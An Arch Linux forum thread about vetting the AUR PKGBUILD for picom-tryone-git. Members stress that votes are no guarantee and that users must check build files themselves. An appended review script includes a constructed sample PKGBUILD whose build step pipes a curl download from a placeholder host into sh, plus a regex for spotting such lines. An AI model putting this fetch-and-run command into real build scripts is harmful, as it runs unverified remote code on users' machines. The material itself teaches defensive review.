
#1 2020-05-27 13:36:52

micchan_hanako
Member
Registered: 2020-04-16
Posts: 4

Could someone verify the pkgbuild for picom-tryone-git?

I'm using the picom-tryone fork of picom since it's the only one that fixes tearing on my machine. Could someone look over the pkgbuild to verify that it doesn't do anything malicious? I looked over it myself and didn't spot anything but I want to be sure that it doesn't do anything that it shouldn't. Better safe than sorry : )

Thanks in advance


#2 2020-05-27 14:13:29

Trilby
Inspector Parrot
Registered: 2011-11-29
Posts: 29,532

Re: Could someone verify the pkgbuild for picom-tryone-git?

I'm pretty sure frebib already looked it over. Do you have any more reason to trust a random reply to a forum thread than you would to trust the maintainer?

It also has 5 votes, so at the very least 5 other people have already looked it over.


"UNIX is simple and coherent..." - Dennis Ritchie, "GNU's Not UNIX" -  Richard Stallman


#3 2020-05-27 16:18:48

micchan_hanako
Member
Registered: 2020-04-16
Posts: 4

Re: Could someone verify the pkgbuild for picom-tryone-git?

Forgive me for being a bit daft here, but how would I go about checking if an AUR package has already been reviewed for security issues? You mentioned 5 votes, where did you come across that?

EDIT: never mind, it was literally written on its AUR page, my bad

Last edited by micchan_hanako (2020-05-27 16:23:23)


#4 2020-05-27 17:38:19

2ManyDogs
Forum Fellow
Registered: 2012-01-15
Posts: 4,645

Re: Could someone verify the pkgbuild for picom-tryone-git?

No matter how many votes an AUR package has, remember:

arch wiki wrote:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

Just because a package has five votes, this does not mean that five people have checked the PKGBUILD for security issues. Many people use the AUR without checking anything, especially if they use an AUR helper.

Also, as Trilby says, anyone on the forum could tell you that the PKGBUILD is fine, but why should you believe them? And if you have issues, why should they care?

The bottom line is that you are responsible for checking yourself.

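Post #4's advice to check the PKGBUILD yourself, as an added shell example that is not from the thread or from the AUR: a read-only first pass over a constructed sample PKGBUILD (not the real picom-tryone-git file; the upstream URL is a placeholder) that lists the declared sources, counts checksums set to SKIP, and flags ad-hoc network fetches and writes outside $pkgdir, which a reviewer then inspects by hand.

```shell
#!/bin/sh
# Added example: a quick offline first pass over a PKGBUILD before makepkg.
# It never executes the PKGBUILD; it only reads it and prints what to look at.

# Constructed sample PKGBUILD for demonstration (not the real picom-tryone-git
# file; the source URL is a placeholder). It contains two deliberate smells.
SAMPLE_PKGBUILD="$(cat <<'EOF'
pkgname=picom-tryone-git
pkgver=8.r1.g0000000
pkgrel=1
source=("git+https://example.invalid/picom-tryone.git"
        "fix-tearing.patch")
sha256sums=('SKIP' 'SKIP')

build() {
  cd "$srcdir/picom"
  curl -s https://example.invalid/extra.sh | sh
  meson --buildtype=release . build
}

package() {
  cd "$srcdir/picom"
  DESTDIR="$pkgdir" ninja -C build install
  cp helper /usr/local/bin/helper
}
EOF
)"

# Print every entry of the source=() array, one per line. A reviewer compares
# these with the upstream the package claims to track (here, the picom fork).
list_sources() {
  printf '%s\n' "$1" | sed -n '/^source=(/,/)/p' | grep -o '"[^"]*"' | tr -d '"'
}

# Count checksum entries set to SKIP: those downloads are not verified at all.
# (SKIP is normal for a git source, but not for a local patch file.)
count_skip_sums() {
  printf '%s\n' "$1" | grep -E '^(sha256|sha512|md5|b2)sums=' \
    | grep -o "'SKIP'" | wc -l | tr -d ' '
}

# Flag lines a packaging function should not need: piping a network fetch into
# a shell, and copying files to system paths instead of under "$pkgdir".
flag_suspicious() {
  printf '%s\n' "$1" | grep -nE \
    '(curl|wget)[^|]*[|][[:space:]]*(sh|bash)|(cp|mv|install)[[:space:]].*[[:space:]]/(usr|etc|bin|home)/' \
    || true
}

list_sources "$SAMPLE_PKGBUILD"
echo "SKIP checksums: $(count_skip_sums "$SAMPLE_PKGBUILD")"
flag_suspicious "$SAMPLE_PKGBUILD"
```

A clean result here is not proof of safety; it only narrows what to read carefully before running makepkg.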
